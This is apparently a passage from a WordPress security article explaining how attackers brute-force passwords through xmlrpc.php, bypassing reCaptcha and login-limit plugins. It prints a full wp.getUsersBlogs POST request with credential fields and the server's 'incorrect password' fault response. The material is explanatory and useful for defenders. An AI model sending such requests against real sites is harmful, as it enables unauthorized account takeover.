In the Bruteforce attack, the hacker tries to guess the correct username and password by running numerous login attempts. Unfortunately, a large number of WordPress sites use weak admin passwords or do not have any security layer added to stop attackers. Those sites are easily compromised with this type of attack.

Others use a strong password and also have security mechanisms in place such as reCaptcha, and auto IP blocking that is effective against brute force attacks but if the hacker decides to use XMLRPC; she does not even need to access the WordPress admin.

A very common tool from Kali Linux, WPSCAN is used to enumerate all the usernames and once it’s done, the hackers brute force the password using the xmlrpc.php file by sending the following HTTP request to the victim site.

POST /xmlrpc.php HTTP/1.1
User-Agent: Fiddler
Host: www.example.com
Content-Length: 164

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

In the above example, a hacker can send thousands of variations until he retrieves the correct password.

The following response is returned against the above request. The response contains the error code and a clear message stating that the tried username and password were incorrect. It is a clear indication that tells the hacker to try again until the correct password is matched.

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2019 13:30:17 GMT
Content-Type: text/xml; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.1.21
Cache-Control: private, must-revalidate
Expires: Sun, 02 Jun 2019 13:30:17 GMT
Content-Length: 403

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>403</int></value>
</member>
<member>
<name>faultString</name>
<value><string>Incorrect username or password.</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>

The response returned HTTP 200 code and the message that the supplied username and password were incorrect. Going through the XMLRPC channel, a hacker does not have to worry about reCaptchas or limit login attempts plugins. She can keep running the variations until the correct password is retrieved.

Note: Brute Force attacks are resource-intensive and cause performance issues as well. The trial and error process runs in a loop for a longer period of time that can keep your server busy to serve the actual visitors. This unnecessary resource consumption causes servers to consume more power.